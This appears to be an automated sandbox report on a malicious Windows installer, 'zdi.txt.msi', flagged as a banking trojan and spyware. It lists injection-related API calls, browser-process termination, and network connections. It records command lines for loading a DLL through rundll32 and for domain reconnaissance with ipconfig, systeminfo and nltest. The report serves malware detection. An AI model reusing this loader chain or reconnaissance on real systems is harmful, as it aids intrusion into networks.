Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49956
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49953
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49997
Source: unknown	Network traffic detected: HTTP traffic on port 50037 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49891 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49873
Source: unknown	Network traffic detected: HTTP traffic on port 50041 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50033 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50043
Source: unknown	Network traffic detected: HTTP traffic on port 50020 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50042
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50045
Source: unknown	Network traffic detected: HTTP traffic on port 50054 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50044
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50047
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50046
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50005
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50049
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50048
Source: unknown	Network traffic detected: HTTP traffic on port 50051 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50048 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50050
Source: unknown	Network traffic detected: HTTP traffic on port 49934 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50027 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49962 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50052
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50051
Source: unknown	Network traffic detected: HTTP traffic on port 50044 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49904
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49946
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49988

Source: unknown	HTTPS traffic detected: 104.21.16.251:443 -> 192.168.2.4:49865 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.16.251:443 -> 192.168.2.4:49914 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.68.89:443 -> 192.168.2.4:49967 version: TLS 1.2

E-Banking Fraud

Checks if browser processes are running

Source: C:\Windows\explorer.exe	Code function: CreateToolhelp32Snapshot,Process32First,GetCurrentProcessId,OpenProcess,StrStrIA,StrStrIA,StrStrIA,TerminateProcess,CloseHandle,Process32Next,CloseHandle, chrome.exe		9_2_0B8D4948
Source: C:\Windows\explorer.exe	Code function: CreateToolhelp32Snapshot,Process32First,GetCurrentProcessId,OpenProcess,StrStrIA,StrStrIA,StrStrIA,TerminateProcess,CloseHandle,Process32Next,CloseHandle, iexplore.exe		9_2_0B8D4948

Abnormal high CPU Usage

Source: C:\Windows\explorer.exe

Process Stats: CPU usage > 49%

Contains functionality to call native functions

Source: C:\Windows\System32\rundll32.exe	Code function: 5_3_0000023CDA68D326 NtProtectVirtualMemory,	5_3_0000023CDA68D326
Source: C:\Windows\System32\rundll32.exe	Code function: 5_3_0000023CDA68D2B6 NtAllocateVirtualMemory,	5_3_0000023CDA68D2B6
Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_0000023CDA4871B0 NtClose,	5_2_0000023CDA4871B0
Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_0000023CDA498149 NtSetContextThread,	5_2_0000023CDA498149
Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_0000023CDA481600 NtClose,RtlExitUserThread,	5_2_0000023CDA481600
Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_0000023CDA497A50 NtSetContextThread,	5_2_0000023CDA497A50
Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_0000023CDA4817B0 NtClose,NtClose,	5_2_0000023CDA4817B0
Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_0000023CDA4B4740 NtFreeVirtualMemory,	5_2_0000023CDA4B4740
Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_0000023CDA4B3F40 NtAllocateVirtualMemory,	5_2_0000023CDA4B3F40
Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_0000023CDA4B4360 NtCreateThreadEx,	5_2_0000023CDA4B4360
Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_0000023CDA4B4BE0 NtProtectVirtualMemory,	5_2_0000023CDA4B4BE0
Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_0000023CDA4B4FF0 NtQueueApcThread,	5_2_0000023CDA4B4FF0
Source: C:\Windows\explorer.exe	Code function: 9_2_0137C704 NtDelayExecution,	9_2_0137C704
Source: C:\Windows\explorer.exe	Code function: 9_2_0137B388 NtAllocateVirtualMemory,	9_2_0137B388
Source: C:\Windows\explorer.exe	Code function: 9_2_013782B4 NtFreeVirtualMemory,	9_2_013782B4
Source: C:\Windows\explorer.exe	Code function: 9_2_01380130 NtAllocateVirtualMemory,	9_2_01380130
Source: C:\Windows\explorer.exe	Code function: 9_2_013781C8 NtWriteFile,	9_2_013781C8
Source: C:\Windows\explorer.exe	Code function: 9_2_01378240 NtClose,	9_2_01378240
Source: C:\Windows\explorer.exe	Code function: 9_2_013780B8 RtlInitUnicodeString,NtCreateFile,	9_2_013780B8
Source: C:\Windows\explorer.exe	Code function: 9_2_0B8D248C NtFreeVirtualMemory,	9_2_0B8D248C
Source: C:\Windows\explorer.exe	Code function: 9_2_0B8D241C NtAllocateVirtualMemory,	9_2_0B8D241C

Contains functionality to communicate with device drivers

Source: C:\Windows\System32\rundll32.exe

Code function: 5_2_00007FFDFA906B7C: CreateFileW,DeviceIoControl,CloseHandle,

5_2_00007FFDFA906B7C

Contains functionality to launch a process as a different user

Source: C:\Windows\System32\rundll32.exe

5_2_00007FFDFA8ADA48

Creates files inside the system directory

Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\424593.msi	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\MSI468D.tmp	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\MSI46EC.tmp	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\MSI471C.tmp	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\MSI473C.tmp	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\inprogressinstallinfo.ipi	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\SourceHash{998A301A-3216-4DC9-93E2-7045B0436D77}	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\MSI4808.tmp	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\MSI48D4.tmp	Jump to behavior

Deletes files inside the Windows folder

Source: C:\Windows\System32\msiexec.exe

File deleted: C:\Windows\Installer\MSI468D.tmp

Jump to behavior

Detected potential crypto function

Source: C:\Windows\Installer\MSI48D4.tmp	Code function: 3_2_00C16A50	3_2_00C16A50
Source: C:\Windows\Installer\MSI48D4.tmp	Code function: 3_2_00C4F032	3_2_00C4F032
Source: C:\Windows\Installer\MSI48D4.tmp	Code function: 3_2_00C3C2CA	3_2_00C3C2CA
Source: C:\Windows\Installer\MSI48D4.tmp	Code function: 3_2_00C492A9	3_2_00C492A9
Source: C:\Windows\Installer\MSI48D4.tmp	Code function: 3_2_00C3E270	3_2_00C3E270
Source: C:\Windows\Installer\MSI48D4.tmp	Code function: 3_2_00C484BD	3_2_00C484BD
Source: C:\Windows\Installer\MSI48D4.tmp	Code function: 3_2_00C3A587	3_2_00C3A587
Source: C:\Windows\Installer\MSI48D4.tmp	Code function: 3_2_00C1C870	3_2_00C1C870
Source: C:\Windows\Installer\MSI48D4.tmp	Code function: 3_2_00C3A915	3_2_00C3A915
Source: C:\Windows\Installer\MSI48D4.tmp	Code function: 3_2_00C34920	3_2_00C34920
Source: C:\Windows\Installer\MSI48D4.tmp	Code function: 3_2_00C40A48	3_2_00C40A48
Source: C:\Windows\Installer\MSI48D4.tmp	Code function: 3_2_00C19CC0	3_2_00C19CC0
Source: C:\Windows\Installer\MSI48D4.tmp	Code function: 3_2_00C45D6D	3_2_00C45D6D
Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_00007FFDFA97BB1C	5_2_00007FFDFA97BB1C
Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_00007FFDFA989AF0	5_2_00007FFDFA989AF0
Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_00007FFDFA8AFA78	5_2_00007FFDFA8AFA78
Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_00007FFDFA8B9C5C	5_2_00007FFDFA8B9C5C
Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_00007FFDFA8AC878	5_2_00007FFDFA8AC878
Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_00007FFDFA8C79F8	5_2_00007FFDFA8C79F8
Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_00007FFDFA8DEA05	5_2_00007FFDFA8DEA05
Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_00007FFDFA8BBA28	5_2_00007FFDFA8BBA28
Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_00007FFDFA994A20	5_2_00007FFDFA994A20
Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_00007FFDFA8B69A0	5_2_00007FFDFA8B69A0
Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_00007FFDFA8AAF20	5_2_00007FFDFA8AAF20
Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_00007FFDFA922E90	5_2_00007FFDFA922E90
Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_00007FFDFA8C9E64	5_2_00007FFDFA8C9E64
Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_00007FFDFA8F1E90	5_2_00007FFDFA8F1E90
Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_00007FFDFA906E84	5_2_00007FFDFA906E84
Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_00007FFDFA8CBEDC	5_2_00007FFDFA8CBEDC
Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_00007FFDFA98D04C	5_2_00007FFDFA98D04C
Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_00007FFDFA990FAC	5_2_00007FFDFA990FAC
Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_00007FFDFA8ABCB8	5_2_00007FFDFA8ABCB8
Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_00007FFDFA8ADCBC	5_2_00007FFDFA8ADCBC
Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_00007FFDFA8AEDE0	5_2_00007FFDFA8AEDE0
Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_00007FFDFA8B9D8C	5_2_00007FFDFA8B9D8C
Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_00007FFDFA8D530C	5_2_00007FFDFA8D530C
Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_00007FFDFA8B5320	5_2_00007FFDFA8B5320
Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_00007FFDFA998330	5_2_00007FFDFA998330
Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_00007FFDFA8E22D4	5_2_00007FFDFA8E22D4
Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_00007FFDFA8CC3A8	5_2_00007FFDFA8CC3A8
Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_00007FFDFA8D50F8	5_2_00007FFDFA8D50F8
Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_00007FFDFA8B70EC	5_2_00007FFDFA8B70EC
Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_00007FFDFA8B61E0	5_2_00007FFDFA8B61E0
Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_00007FFDFA8DC180	5_2_00007FFDFA8DC180
Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_00007FFDFA9801A4	5_2_00007FFDFA9801A4
Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_00007FFDFA8CD698	5_2_00007FFDFA8CD698
Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_00007FFDFA97D670	5_2_00007FFDFA97D670
Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_00007FFDFA8B7680	5_2_00007FFDFA8B7680
Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_00007FFDFA8AA83C	5_2_00007FFDFA8AA83C
Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_00007FFDFA995834	5_2_00007FFDFA995834
Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_00007FFDFA969470	5_2_00007FFDFA969470
Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_00007FFDFA8FD604	5_2_00007FFDFA8FD604
Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_00007FFDFA8BB560	5_2_00007FFDFA8BB560
Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_0000023CDA489500	5_2_0000023CDA489500
Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_0000023CDA49A100	5_2_0000023CDA49A100
Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_0000023CDA499120	5_2_0000023CDA499120
Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_0000023CDA49B4E0	5_2_0000023CDA49B4E0
Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_0000023CDA494DB0	5_2_0000023CDA494DB0
Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_0000023CDA4A4550	5_2_0000023CDA4A4550
Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_0000023CDA485D60	5_2_0000023CDA485D60
Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_0000023CDA4B0210	5_2_0000023CDA4B0210
Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_0000023CDA4A7220	5_2_0000023CDA4A7220
Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_0000023CDA4955C0	5_2_0000023CDA4955C0
Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_0000023CDA4899D0	5_2_0000023CDA4899D0
Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_0000023CDA4AB5E0	5_2_0000023CDA4AB5E0
Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_0000023CDA4A55E0	5_2_0000023CDA4A55E0
Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_0000023CDA4916A0	5_2_0000023CDA4916A0
Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_0000023CDA4942A0	5_2_0000023CDA4942A0
Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_0000023CDA4A82A0	5_2_0000023CDA4A82A0
Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_0000023CDA48A730	5_2_0000023CDA48A730
Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_0000023CDA4866C0	5_2_0000023CDA4866C0
Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_0000023CDA49BED0	5_2_0000023CDA49BED0
Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_0000023CDA4A66E0	5_2_0000023CDA4A66E0
Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_0000023CDA4A13A3	5_2_0000023CDA4A13A3
Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_0000023CDA4A2BB0	5_2_0000023CDA4A2BB0
Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_0000023CDA4B1F40	5_2_0000023CDA4B1F40
Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_0000023CDA4B2F60	5_2_0000023CDA4B2F60
Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_0000023CDA4B2812	5_2_0000023CDA4B2812
Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_0000023CDA4AFBC0	5_2_0000023CDA4AFBC0
Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_0000023CDA49CBE0	5_2_0000023CDA49CBE0
Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_0000023CDA4B1490	5_2_0000023CDA4B1490
Source: C:\Windows\explorer.exe	Code function: 9_2_01372164	9_2_01372164
Source: C:\Windows\explorer.exe	Code function: 9_2_01371A7C	9_2_01371A7C
Source: C:\Windows\explorer.exe	Code function: 9_2_01371A8C	9_2_01371A8C
Source: C:\Windows\explorer.exe	Code function: 9_2_0B8D4B50	9_2_0B8D4B50
Source: C:\Windows\explorer.exe	Code function: 9_2_0B969708	9_2_0B969708
Source: C:\Windows\explorer.exe	Code function: 9_2_0B91BB94	9_2_0B91BB94
Source: C:\Windows\explorer.exe	Code function: 9_2_0B96EBB8	9_2_0B96EBB8
Source: C:\Windows\explorer.exe	Code function: 9_2_0B95DB34	9_2_0B95DB34
Source: C:\Windows\explorer.exe	Code function: 9_2_0B952B38	9_2_0B952B38
Source: C:\Windows\explorer.exe	Code function: 9_2_0B940B54	9_2_0B940B54
Source: C:\Windows\explorer.exe	Code function: 9_2_0B91EA84	9_2_0B91EA84
Source: C:\Windows\explorer.exe	Code function: 9_2_0B900A8A	9_2_0B900A8A
Source: C:\Windows\explorer.exe	Code function: 9_2_0B948980	9_2_0B948980
Source: C:\Windows\explorer.exe	Code function: 9_2_0B8DD9E4	9_2_0B8DD9E4
Source: C:\Windows\explorer.exe	Code function: 9_2_0B964940	9_2_0B964940
Source: C:\Windows\explorer.exe	Code function: 9_2_0B9498B0	9_2_0B9498B0
Source: C:\Windows\explorer.exe	Code function: 9_2_0B95D8B8	9_2_0B95D8B8
Source: C:\Windows\explorer.exe	Code function: 9_2_0B92481C	9_2_0B92481C
Source: C:\Windows\explorer.exe	Code function: 9_2_0B90D834	9_2_0B90D834
Source: C:\Windows\explorer.exe	Code function: 9_2_0B908824	9_2_0B908824
Source: C:\Windows\explorer.exe	Code function: 9_2_0B937874	9_2_0B937874
Source: C:\Windows\explorer.exe	Code function: 9_2_0B8D7FD0	9_2_0B8D7FD0
Source: C:\Windows\explorer.exe	Code function: 9_2_0B94AF20	9_2_0B94AF20
Source: C:\Windows\explorer.exe	Code function: 9_2_0B919F68	9_2_0B919F68
Source: C:\Windows\explorer.exe	Code function: 9_2_0B96AE84	9_2_0B96AE84
Source: C:\Windows\explorer.exe	Code function: 9_2_0B8DBEB8	9_2_0B8DBEB8
Source: C:\Windows\explorer.exe	Code function: 9_2_0B960EC0	9_2_0B960EC0
Source: C:\Windows\explorer.exe	Code function: 9_2_0B931ECC	9_2_0B931ECC
Source: C:\Windows\explorer.exe	Code function: 9_2_0B927EE8	9_2_0B927EE8
Source: C:\Windows\explorer.exe	Code function: 9_2_0B8EFE38	9_2_0B8EFE38
Source: C:\Windows\explorer.exe	Code function: 9_2_0B969D94	9_2_0B969D94
Source: C:\Windows\explorer.exe	Code function: 9_2_0B8F9D94	9_2_0B8F9D94
Source: C:\Windows\explorer.exe	Code function: 9_2_0B928DF8	9_2_0B928DF8
Source: C:\Windows\explorer.exe	Code function: 9_2_0B90EDE0	9_2_0B90EDE0
Source: C:\Windows\explorer.exe	Code function: 9_2_0B900D18	9_2_0B900D18
Source: C:\Windows\explorer.exe	Code function: 9_2_0B945D68	9_2_0B945D68
Source: C:\Windows\explorer.exe	Code function: 9_2_0B8D9CBC	9_2_0B8D9CBC
Source: C:\Windows\explorer.exe	Code function: 9_2_0B937C14	9_2_0B937C14
Source: C:\Windows\explorer.exe	Code function: 9_2_0B8FFC72	9_2_0B8FFC72
Source: C:\Windows\explorer.exe	Code function: 9_2_0B9473A0	9_2_0B9473A0
Source: C:\Windows\explorer.exe	Code function: 9_2_0B9183EC	9_2_0B9183EC
Source: C:\Windows\explorer.exe	Code function: 9_2_0B8DE31C	9_2_0B8DE31C
Source: C:\Windows\explorer.exe	Code function: 9_2_0B8D6358	9_2_0B8D6358
Source: C:\Windows\explorer.exe	Code function: 9_2_0B95B370	9_2_0B95B370
Source: C:\Windows\explorer.exe	Code function: 9_2_0B8ED19C	9_2_0B8ED19C
Source: C:\Windows\explorer.exe	Code function: 9_2_0B92318C	9_2_0B92318C
Source: C:\Windows\explorer.exe	Code function: 9_2_0B9051C0	9_2_0B9051C0
Source: C:\Windows\explorer.exe	Code function: 9_2_0B9311CC	9_2_0B9311CC
Source: C:\Windows\explorer.exe	Code function: 9_2_0B9001FB	9_2_0B9001FB
Source: C:\Windows\explorer.exe	Code function: 9_2_0B930114	9_2_0B930114
Source: C:\Windows\explorer.exe	Code function: 9_2_0B944134	9_2_0B944134
Source: C:\Windows\explorer.exe	Code function: 9_2_0B940154	9_2_0B940154
Source: C:\Windows\explorer.exe	Code function: 9_2_0B9170C0	9_2_0B9170C0
Source: C:\Windows\explorer.exe	Code function: 9_2_0B92F018	9_2_0B92F018
Source: C:\Windows\explorer.exe	Code function: 9_2_0B8F6038	9_2_0B8F6038
Source: C:\Windows\explorer.exe	Code function: 9_2_0B93A048	9_2_0B93A048
Source: C:\Windows\explorer.exe	Code function: 9_2_0B90E074	9_2_0B90E074
Source: C:\Windows\explorer.exe	Code function: 9_2_0B8D6078	9_2_0B8D6078
Source: C:\Windows\explorer.exe	Code function: 9_2_0B938788	9_2_0B938788
Source: C:\Windows\explorer.exe	Code function: 9_2_0B8E77E0	9_2_0B8E77E0
Source: C:\Windows\explorer.exe	Code function: 9_2_0B94672C	9_2_0B94672C
Source: C:\Windows\explorer.exe	Code function: 9_2_0B8F5768	9_2_0B8F5768
Source: C:\Windows\explorer.exe	Code function: 9_2_0B95D63C	9_2_0B95D63C
Source: C:\Windows\explorer.exe	Code function: 9_2_0B8F9650	9_2_0B8F9650
Source: C:\Windows\explorer.exe	Code function: 9_2_0B9005A0	9_2_0B9005A0
Source: C:\Windows\explorer.exe	Code function: 9_2_0B91B5D0	9_2_0B91B5D0
Source: C:\Windows\explorer.exe	Code function: 9_2_0B9305FC	9_2_0B9305FC
Source: C:\Windows\explorer.exe	Code function: 9_2_0B8FF5FB	9_2_0B8FF5FB
Source: C:\Windows\explorer.exe	Code function: 9_2_0B945534	9_2_0B945534
Source: C:\Windows\explorer.exe	Code function: 9_2_0B8D453C	9_2_0B8D453C
Source: C:\Windows\explorer.exe	Code function: 9_2_0B8F0540	9_2_0B8F0540
Source: C:\Windows\explorer.exe	Code function: 9_2_0B8D8568	9_2_0B8D8568
Source: C:\Windows\explorer.exe	Code function: 9_2_0B934564	9_2_0B934564
Source: C:\Windows\explorer.exe	Code function: 9_2_0B933498	9_2_0B933498
Source: C:\Windows\explorer.exe	Code function: 9_2_0B9384D8	9_2_0B9384D8
Source: C:\Windows\explorer.exe	Code function: 9_2_0B91F4C4	9_2_0B91F4C4
Source: C:\Windows\explorer.exe	Code function: 9_2_0B9594F0	9_2_0B9594F0
Source: C:\Windows\explorer.exe	Code function: 9_2_0B942430	9_2_0B942430
Source: C:\Windows\explorer.exe	Code function: 9_2_0B92E45C	9_2_0B92E45C
Source: C:\Windows\explorer.exe	Code function: 9_2_0B927448	9_2_0B927448

Found potential string decryption / allocating functions

Source: C:\Windows\System32\rundll32.exe	Code function: String function: 00007FFDFA979670 appears 61 times
Source: C:\Windows\System32\rundll32.exe	Code function: String function: 00007FFDFA8BECA0 appears 298 times
Source: C:\Windows\System32\rundll32.exe	Code function: String function: 00007FFDFA8BC6C0 appears 198 times
Source: C:\Windows\System32\rundll32.exe	Code function: String function: 00007FFDFA979868 appears 296 times
Source: C:\Windows\System32\rundll32.exe	Code function: String function: 00007FFDFA8BF210 appears 62 times
Source: C:\Windows\explorer.exe	Code function: String function: 0B8DD6E8 appears 52 times
Source: C:\Windows\explorer.exe	Code function: String function: 0B8DE160 appears 147 times
Source: C:\Windows\explorer.exe	Code function: String function: 0B8DD5A8 appears 35 times
Source: C:\Windows\explorer.exe	Code function: String function: 0B8F7D54 appears 31 times
Source: C:\Windows\Installer\MSI48D4.tmp	Code function: String function: 00C3325F appears 103 times
Source: C:\Windows\Installer\MSI48D4.tmp	Code function: String function: 00C33790 appears 39 times
Source: C:\Windows\Installer\MSI48D4.tmp	Code function: String function: 00C33292 appears 66 times

Sample file is different than original file name gathered from version info

Source: zdi.txt.msi	Binary or memory string: OriginalFilenameviewer.exeF vs zdi.txt.msi
Source: zdi.txt.msi	Binary or memory string: OriginalFilenameAICustAct.dllF vs zdi.txt.msi

Source: classification engine

Classification label: mal100.spre.bank.troj.spyw.evad.winMSI@69/30@4/3

Source: C:\Windows\Installer\MSI48D4.tmp

Code function: 3_2_00C13860 CreateToolhelp32Snapshot,CloseHandle,Process32FirstW,OpenProcess,CloseHandle,Process32NextW,CloseHandle,

3_2_00C13860

Source: C:\Windows\Installer\MSI48D4.tmp

3_2_00C14BA0

Source: C:\Windows\Installer\MSI48D4.tmp

Code function: 3_2_00C145B0 LoadResource,LockResource,SizeofResource,

3_2_00C145B0

Source: C:\Windows\System32\msiexec.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\CML4871.tmp

Jump to behavior

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7652:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7412:120:WilError_03
Source: C:\Windows\System32\rundll32.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5104:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2920:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3716:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5840:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1272:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5088:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7228:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6296:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7988:120:WilError_03

Source: C:\Windows\System32\msiexec.exe

File created: C:\Windows\TEMP\~DFCEF614FEBAB0279B.TMP

Jump to behavior

Source: C:\Windows\System32\systeminfo.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\System32\systeminfo.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor

Source: C:\Windows\explorer.exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Windows\Installer\MSI48D4.tmp

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: unknown

Process created: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\rundll32.exe" C:\Users\user\AppData\Roaming\wait.dll, Jump

Source: ucsafe64.tmp.9.dr

Source: unknown	Process created: C:\Windows\System32\msiexec.exe "C:\Windows\System32\msiexec.exe" /i "C:\Users\user\Desktop\zdi.txt.msi"
Source: unknown	Process created: C:\Windows\System32\msiexec.exe C:\Windows\system32\msiexec.exe /V
Source: C:\Windows\System32\msiexec.exe	Process created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding 55FA980756605C03F579DEFA7A4ADAF1
Source: C:\Windows\System32\msiexec.exe	Process created: C:\Windows\Installer\MSI48D4.tmp "C:\Windows\Installer\MSI48D4.tmp" /DontWait C:/Windows/SysWOW64/rundll32.exe C:\Users\user\AppData\Roaming\wait.dll, Jump
Source: unknown	Process created: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\rundll32.exe" C:\Users\user\AppData\Roaming\wait.dll, Jump
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\System32\rundll32.exe "C:\Windows\SysWOW64\rundll32.exe" C:\Users\user\AppData\Roaming\wait.dll, Jump
Source: C:\Windows\explorer.exe	Process created: C:\Windows\System32\cmd.exe /c ipconfig /all
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\ipconfig.exe ipconfig /all
Source: C:\Windows\explorer.exe	Process created: C:\Windows\System32\cmd.exe /c systeminfo
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\systeminfo.exe systeminfo
Source: C:\Windows\System32\systeminfo.exe	Process created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Source: C:\Windows\explorer.exe	Process created: C:\Windows\System32\cmd.exe /c nltest /domain_trusts
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\nltest.exe nltest /domain_trusts
Source: C:\Windows\explorer.exe	Process created: C:\Windows\System32\cmd.exe /c nltest /domain_trusts /all_trusts
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
